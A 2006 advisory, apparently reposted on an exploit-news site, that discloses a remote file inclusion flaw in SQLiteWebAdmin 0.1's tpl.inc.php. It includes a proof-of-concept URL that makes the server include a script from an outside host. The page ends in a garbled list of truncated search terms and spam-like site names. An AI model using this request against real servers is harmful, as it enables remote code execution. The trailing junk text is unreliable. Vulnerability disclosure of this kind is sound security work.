about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , SQLiteWebAdmin 0.1 (tpl.inc.php) Remote Include Vulnerability



2006-08-07 SQLiteWebAdmin 0.1 (tpl.inc.php) Remote Include Vulnerability 
Rated as : High Risk

SQLiteWebAdmin
http://sourceforge.net/projects/sqlitewebadmin

SQLiteWebAdmin is a simple PHP program for administrating
a SQL DataBase.

It suffers of a Remote File Inclusion Vulnerability.

The bug is in the "tpl.inc.php" program in the "lib"
directory, and is exploited when passing the parameter
"conf[classpath]".

http://www.server.com/lib/tpl.inc.php?conf[classpath]=[URL-OF-SCRIPT]

Succesfull explotation, needs register_globals=on

Att.
SirDarckCat
elhacker.net
securitydot.net - 2006-08-07

Advertising

Copyright 2007, SecurityDot
Tue, 01 Dec 2009 09:32:31 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
www.freewl www.18soon modules/ic www.18soon iwin.ws www.mqdm.n inject grand-shin Www.rosia junmyliu.b game.per1. sepichers www.lt99.c 318sh.cn/ ...ml\\\ www.spaxm. 318sh.cn/ www.onemen Www.hotest ...ml\\\ CMD www.etclov gdwensheng www.snuffx gdwensheng gdwensheng www.sexvid dudhwali www.sexvid grandshine blog.sina. wwwworld.s john the r gdwensheng CuteNews www.qkport Sex pic tu www.wo118. 1313.cc news for c Ncdex.com www.gzsang www.9421.c 200 /compo search/exp www.tom999 news for c 2..._conve arabissex www.234cc.